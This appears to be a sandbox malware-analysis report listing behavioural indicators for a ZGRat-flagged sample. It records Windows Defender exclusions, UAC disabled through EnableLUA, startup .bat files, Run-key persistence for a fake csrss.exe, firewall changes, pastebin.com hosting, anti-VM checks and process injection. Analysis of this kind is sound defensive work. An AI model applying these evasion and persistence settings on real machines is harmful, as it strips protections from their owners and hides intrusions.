| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
ZGRat
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IhdA8kGYCJ7pM22YuVOKDfB6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7gZzdgjUiY3QyM00vsQEIk5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pQJacl2Bf7LzHavCMG3hKLj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lM3zkzFQczpDAHvJH7vWTU0q.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHu5gmDPrdHQrxBALgEWcRKb.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUN0CKZe3wKRDvMmRMVSstse.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vjZEleAXp56EtwGN39UQAyp2.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2272 set thread context of 4556 | N/A | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u318.0.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u318.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u318.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
